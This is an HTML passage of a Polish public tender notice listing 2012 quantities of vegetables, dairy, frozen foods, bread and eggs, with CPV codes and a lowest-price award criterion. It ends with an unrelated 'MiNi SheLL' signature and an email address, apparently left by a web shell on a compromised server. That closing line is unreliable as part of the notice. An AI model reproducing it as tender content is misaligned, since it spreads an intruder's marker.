<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Marchew	60	600	kg			
2	Cebula	60	600	kg			
3	Ziemniak	1000	10000	kg			
4	Pietruszka korzeń	9	90	kg			
5	Seler	5	50	kg			
6	Por	3	30	szt			
7	Natka pietruszki	10	100	szt			
8	Koper	10	100	szt			
9	Szczypior	3	30	szt			
10	Czosnek	3	30	szt			
11	Papryka kolorowa	8	80	kg			
12	Pomidor	30	300	kg			
13	Ogórek zielony	30	300	kg			
14	Ogórek kiszony	20	200	kg			
15	Kapusta kiszona	40	400	kg			
16	Kapusta pekińska	40	400	kg			
17	Kapusta biała	20	200	kg			
18	Kapusta włoska	20	60	kg			
19	Kapusta czerwona	20	60	kg			
20	Pieczarki	15	150	kg			
21	Kalafior	3	15	kg			
22	Fasola średnia	10	60	kg			
23	Burak	20	400	kg			
24	Groch łuskany połówki	5	50	kg			
25	Ogórki konserwowe całe (900g)	20	200	szt			
26	Szczaw konserwowy krojony(550g)	10	50	szt			
27	Papryka konserwowa ćwiartki(400g)	2	20	szt			
28	Kukurydza konserwowa(400g)	2	20	szt			
29 	Groszek konserwowy(400g)	10	60	szt			
30	Banan	40	80	kg			
31	Kiwi	140	140	szt			
32	Mandarynka	20	20	kg			
33	Jabłka	30	30	kg			
34	Gruszka	40	40	kg			
35	Pomarańcz	50	50	kg			
37	Sałata zielona	50	150	szt			
38	Rzodkiewka	4	20	szt			
Ogółem: *	X	X			
* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać  do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 4 dotyczy:
     Produkty mleczarskie, kod CPV 15500000-3 
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony   
     w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 4 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Śmietana 18%(400ml)	150	1800	szt			
2	Mleko UHT 3,2%	50	500	szt			
3	Serek waniliowy(150g)	10	120	szt			
4	Serek topiony(200g)	45	540	szt			
5	Jogurt owocowy(150g)	24	288	szt			
6	Deser mleczny czekoladowy(120g)	24	288	szt			
7	Ser żółty 45%tł.(blok 3kg)	15	180	kg			
8	Serek homogenizowany(140g)	12	144	szt			
9	Twaróg tłusty kostka 250g	9	90	szt			
10	Twaróg chudy kostka  250g 	9	90	szt			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 5 dotyczy:
     Ryby przetworzone i konserwowane, kod CPV 15200000-0
                    Produkty głęboko mrożone, kod CPV 158960000-5
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
     formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 5 do  SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Filet z miruny mrożony	30	300	kg			
2	Filet z pangi mrożony	30	60	kg			
3	Paluszki rybne z fileta	24	48	kg			
4	Makrela wędzona	4	40	szt			
5	Śledż małosolny(4kg)	20	20	kg			
6	Pierogi z kapustą i grzybami(0,5kg)	85	170	szt			
7	Pierogi z serem(0,5kg)	85	170	szt			
8	Pierogi z truskawkami(0,5kg)	85	85	szt			
9	Pyzy z mięsem(0,5kg)	100	300	szt			
10	Frytka karbowana(2,5kg)	8	96	kg			
11	Marchew z groszkiem mrożona(2,5kg)	15	150	kg			
12	Mieszanka kompotowa mrożona(2,5kg)	5	15	kg			
13	Mieszanka jarzynowa mrożona(2,5kg)	5	15	kg			
14	Truskawka mrożona(2,5kg)	5	75	kg			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 6 dotyczy:
      Pieczywo świeże wyroby piekarskie i ciastkarskie kod CPV 15810000-9
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
      formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 6 do  SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Chleb krojony pszenno-żytni 	100	1200	szt			
2	Bułka zwykła 0,08g	300	3600	szt			
3	Bułka sucha	100	1200	szt			
4	Bułka słodka	24	288	szt			
5	Bułka tarta(0,5kg)	20	240	szt			
6	Bułka zapiekanka(25cm)	24	288	szt			
7	Drożdżówka	4	48	szt			
8	Pączek	140	140	szt			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 7 dotyczy:
      Jaja kurze konsumpcyjne świeże klasa A  kod CPV 03142500-3
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
      formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 7 do  SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Jajka L	500	6000	szt			
2	Jajka XL	300	3600	szt			
3	Jajka M	200	2400	szt			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com